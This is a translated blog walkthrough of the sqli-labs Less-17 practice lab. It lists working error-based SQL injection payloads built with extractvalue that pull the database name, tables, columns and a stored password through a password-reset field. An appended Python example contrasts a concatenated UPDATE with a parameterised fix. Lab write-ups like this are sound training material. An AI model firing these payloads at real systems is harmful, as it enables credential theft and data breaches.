[Network security] sqli-labs Less-17 problem-solving analysis

This level tests error-based injection.

This article uses extractvalue for the injection.

For the principle and technique, see [Network Security] sqli-labs Less-5 Detailed Analysis of Problem Solving.

Determine the type of injection

The response echoed by the page shows that the injection type is single-quote injection.



Query the database name

Enter admin as the account.
Enter the following as the password:

1' and (extractvalue(1,concat(0x5c,database(),0x5c)))# 

The database name is security.


Query the table names

Enter admin as the account.
Enter the following as the password:

1' and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))# 

The response returns four tables.


Query the column names

Enter admin as the account.
Enter the following as the password:

1' and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x5c)))# 

The response returns three columns.


Query the data

Enter admin as the account.
Enter the following as the password:

1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin1') b) ,0x5c)))#  
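
Why the single quote matters and how binding the value closes the hole, as an added example that is not part of the original post or of sqli-labs. It assumes the password-reset form builds an UPDATE statement by pasting the password field between quotes (the page does not show the server code), uses sqlite3 as a stand-in for MySQL, and the function names are hypothetical.

```python
import sqlite3

# Constructed copy of the database-name payload shown earlier on this page.
PAYLOAD = "1' and (extractvalue(1,concat(0x5c,database(),0x5c)))# "

def build_update_concat(username, password):
    # Assumed vulnerable pattern: the password field is pasted between quotes.
    return "UPDATE users SET password = '%s' WHERE username='%s'" % (password, username)

def code_outside_literals(sql):
    # Text MySQL would parse as code: outside '...' literals, before a # comment.
    out, in_str, i = [], False, 0
    while i < len(sql):
        ch = sql[i]
        if in_str:
            if ch == "\\":                 # backslash escape: skip next char
                i += 1
            elif ch == "'" and sql[i + 1:i + 2] == "'":
                i += 1                     # '' is an escaped quote, still in literal
            elif ch == "'":
                in_str = False
        elif ch == "'":
            in_str = True
        elif ch == "#":
            break                          # rest of the line is a comment
        else:
            out.append(ch)
        i += 1
    return "".join(out)

def reset_password_bound(conn, username, password):
    # Hardened form: both values travel as bound parameters, never as SQL text.
    cur = conn.execute("UPDATE users SET password = ? WHERE username = ?",
                       (password, username))
    conn.commit()
    return cur.rowcount

def demo():
    conn = sqlite3.connect(":memory:")     # sqlite3 stands in for MySQL here
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "old-a"), ("admin1", "old-b")])  # constructed rows
    changed = reset_password_bound(conn, "admin", PAYLOAD)
    rows = dict(conn.execute("SELECT username, password FROM users"))
    return changed, rows

if __name__ == "__main__":
    print(code_outside_literals(build_update_concat("admin", PAYLOAD)))
    print(demo())
```

With concatenation the extractvalue call lands outside the string literal and the WHERE clause falls behind the # comment; with bound parameters the same input is stored as an ordinary password for one row.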



Summary

That concludes the detailed analysis of [Network Security] sqli-labs Less-17. The detailed analysis of [Network Security] sqli-labs Less-18 will be shared later.

I am Qiu said, see you next time.


Origin blog.csdn.net/2301_77485708/article/details/131892318